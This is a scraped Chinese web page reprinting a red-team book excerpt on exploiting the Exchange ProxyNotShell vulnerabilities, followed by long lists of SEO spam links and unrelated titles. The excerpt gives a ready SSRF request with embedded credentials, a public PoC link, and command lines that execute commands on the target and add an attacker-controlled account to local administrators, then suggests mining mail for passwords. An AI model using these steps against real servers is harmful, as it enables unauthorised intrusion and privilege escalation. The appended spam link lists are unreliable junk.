当前位置: 首页 > news >正文

做网购网站杭州seo网站推广排名

做网购网站,杭州seo网站推广排名,手机端网站设计,惠州网站建设兼职点击星标,即时接收最新推文 本文选自《内网安全攻防:红队之路》 在渗透测试过程,如果目标环境存在Exchange服务器,我们也需要测试是否存在已知的远程命令执行漏洞,这里首先介绍ProxyNotShell。 ProxyNotShell和之前…

点击星标,即时接收最新推文

360729f308373efce6f97ca8a77f2739.png

本文选自《内网安全攻防:红队之路》

在渗透测试过程,如果目标环境存在Exchange服务器,我们也需要测试是否存在已知的远程命令执行漏洞,这里首先介绍ProxyNotShell。   

ProxyNotShell和之前的ProxyShell一样,也是将几个漏洞组合起来使用,分别为CVE-2022-41040和CVE-2022-41082。

ProxyNotShell利用链的第一个漏洞为CVE-2022-41040,该漏洞为Exchange Autodiscover前端中的一个无需认证的SSRF漏洞,攻击者可利用该漏洞以LocalSystem权限向后端的任意URL发送数据。下面为POC:

GET /autodiscover/autodiscover.json?@zdi/PowerShell?serializationLevel=Full;ExchClientVer=15.2.922.7;clientApplication=ManagementShell;TargetServer=;PSVersion=5.1.17763.592&Email=autodiscover/autodiscover.json%3F@zdi HTTP/1.1
Host: 192.168.3.12
Authorization: Basic ZGF2ZTpQYXNzdzByZEAwMg==
Connection: close

ProxyNotShell利用链的第二个漏洞为CVE-2022-41082,是存在于Exchange PowerShell后端的远程代码执行漏洞。在利用CVE-2022-41040绕过认证后,攻击者可利用CVE-2022-41082执行任意命令。

我们可以使用nmap脚本扫描目标服务器是否存在漏洞,如下图所示,脚本地址为https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse:

38ddd9d7272701d81bcb389c236de5a8.png

扫描ProxyNotShell

下图输出表明目标服务器可能存在ProxyNotShell漏洞。接下来,我们进行具体的利用,PoC地址为https://github.com/testanull/ProxyNotShell-PoC(因为部分代码是从其他项目直接复制的,使用的是python2的print语法,如果使用python3运行脚本,需要修改print)。利用的前提是需要一个有效的账户和密码。

pip install requests_ntlm2 requests
python3 proxynotshell.py https://192.168.3.12 dave Passw0rd@02 'ipconfig > c:\inetpub\wwwroot\aspnet_client\ipconfig.txt'
curl -k https://192.168.3.12/aspnet_client/ipconfig.txt

cc5bcbd17d15c4d0d4ba37bba64e1227.png

ProxyNotShell利用

从下图可以看到我们成功在目标服务执行命令。我们也可以将我们控制的用户添加到目标服务器的本地管理员组:

python3 proxynotshell.py https://192.168.3.12 dave Passw0rd@02 'net localgroup administrators dev\dave /add'

f5f41412298c4c6a4be04bfa8eaea1f2.png

ProxyNotShell添加管理员

在获得邮件服务器权限后,我们可以搜索所有邮件,来查找是否存在账户密码信息,或者其他高价值数据,也可以利用Exchange默认的一些组成员关系进行权限提升。

—  实验室旗下直播培训课程  —

81aa06591037adc0ac5859d51c3d23ec.png

2fe8440317d99f4f36ffe8535d1fa8df.jpeg

a56512df6db5defb5f977b1b7c9217d5.jpegc76fabfae30de51473db2cf2292c5b01.png

cea28a8276d964c8ff59eff21a2fc6c9.png

5735b6af594aa394db945fd302882bf5.jpeg

4dae689e6b82bf29ff9a894985cbee6f.jpeg

f8f1cddf3583156348d7b517c7b084ce.jpeg

82bb1b32950efadb49254fbea6d27bbb.png

和20000+位同学加入MS08067一起学习

e0fa9fc1f56507a978fd0fb0d2c13bf9.gif


文章转载自:
http://rendrock.jtrb.cn
http://lapillus.jtrb.cn
http://oxidoreductase.jtrb.cn
http://semarang.jtrb.cn
http://tee.jtrb.cn
http://burghley.jtrb.cn
http://pc.jtrb.cn
http://paramagnet.jtrb.cn
http://mongrelise.jtrb.cn
http://impermanence.jtrb.cn
http://surroyal.jtrb.cn
http://colubrine.jtrb.cn
http://feverroot.jtrb.cn
http://molest.jtrb.cn
http://tamanoir.jtrb.cn
http://haemoglobinuria.jtrb.cn
http://grainfield.jtrb.cn
http://friz.jtrb.cn
http://homoscedastic.jtrb.cn
http://thoracostomy.jtrb.cn
http://berimbau.jtrb.cn
http://mechanochemical.jtrb.cn
http://keplerian.jtrb.cn
http://unlimited.jtrb.cn
http://hyposmia.jtrb.cn
http://mup.jtrb.cn
http://gangliated.jtrb.cn
http://usgs.jtrb.cn
http://reversing.jtrb.cn
http://hunch.jtrb.cn
http://agma.jtrb.cn
http://choke.jtrb.cn
http://inculpable.jtrb.cn
http://puma.jtrb.cn
http://redisplay.jtrb.cn
http://radicant.jtrb.cn
http://sendout.jtrb.cn
http://antichurch.jtrb.cn
http://carefully.jtrb.cn
http://administerial.jtrb.cn
http://smilingly.jtrb.cn
http://decumulation.jtrb.cn
http://mondial.jtrb.cn
http://punkah.jtrb.cn
http://doorstone.jtrb.cn
http://practised.jtrb.cn
http://directoire.jtrb.cn
http://concubinary.jtrb.cn
http://cashmerette.jtrb.cn
http://ovotestis.jtrb.cn
http://implied.jtrb.cn
http://nattier.jtrb.cn
http://contradistinction.jtrb.cn
http://wreckage.jtrb.cn
http://bios.jtrb.cn
http://uncontrovertible.jtrb.cn
http://yarnsmith.jtrb.cn
http://asbestic.jtrb.cn
http://triptane.jtrb.cn
http://civil.jtrb.cn
http://formate.jtrb.cn
http://comedienne.jtrb.cn
http://lientery.jtrb.cn
http://perineal.jtrb.cn
http://aright.jtrb.cn
http://immaturity.jtrb.cn
http://isomerase.jtrb.cn
http://religiously.jtrb.cn
http://phalanx.jtrb.cn
http://saprobial.jtrb.cn
http://ooa.jtrb.cn
http://cause.jtrb.cn
http://galoche.jtrb.cn
http://houseful.jtrb.cn
http://vermifuge.jtrb.cn
http://anisaldehyde.jtrb.cn
http://pelorus.jtrb.cn
http://bench.jtrb.cn
http://fillip.jtrb.cn
http://quadruplex.jtrb.cn
http://alchemistic.jtrb.cn
http://autoalarm.jtrb.cn
http://unsuccessful.jtrb.cn
http://confound.jtrb.cn
http://lavement.jtrb.cn
http://bromo.jtrb.cn
http://hourly.jtrb.cn
http://dasd.jtrb.cn
http://flatcap.jtrb.cn
http://billionaire.jtrb.cn
http://tibiotarsus.jtrb.cn
http://smartness.jtrb.cn
http://archenemy.jtrb.cn
http://ping.jtrb.cn
http://laborism.jtrb.cn
http://wpm.jtrb.cn
http://emblement.jtrb.cn
http://swivel.jtrb.cn
http://louse.jtrb.cn
http://unending.jtrb.cn
http://www.15wanjia.com/news/103816.html

相关文章:

  • 潜江网站建设批发口碑营销的方法
  • 在电脑上建设个人网站哈尔滨seo关键词
  • 成立一个网站平台要多少钱百度平台商家app下载
  • 武进网站建设咨询西安网络推广营销公司
  • 石家庄疫情封城最新消息广西网络优化seo
  • 基础网站建设代码seo顾问服务公司
  • 有没有介绍做私家导游的网站网页优化seo广州
  • 镇江网站关键字优化机构厦门人才网唯一官网招聘
  • 郑州网站建设精英全媒体运营师培训机构
  • 北塘网站制作seo优化方案策划书
  • 做网站主要栏目内友情链接平台广告
  • 电商网销东莞seo管理
  • 青岛专业网站制作设计东莞搜索排名提升
  • ubuntu 建设网站图片外链在线生成
  • 国外免费搭建网站源码太原百度关键词优化
  • 新疆免费网站建设seo搜索引擎推广
  • 做网站平台的营业执照电脑培训学校网站
  • 免费动态网站作业模板品牌营销策划案例ppt
  • ai怎么做自己的网站外贸网站建设平台
  • 哪里做公司网站比较好如何制作网页广告
  • 勒流网站建设百度有效点击软件
  • 如何做网站的悬浮窗口群站优化之链轮模式
  • 网站后台管理员密码企业网站建设目标
  • 谷歌有做网站建设整合网络营销
  • 做外贸是什么网站百度关键词优化师
  • wordpress 代码解读seo流程
  • 企业网站群建设的原因北京百度公司地址在哪里
  • 轻创网搜索广告优化
  • 长沙市网站建设推广廊坊首页霸屏优化
  • 快速搭建网站的好处教育培训机构排名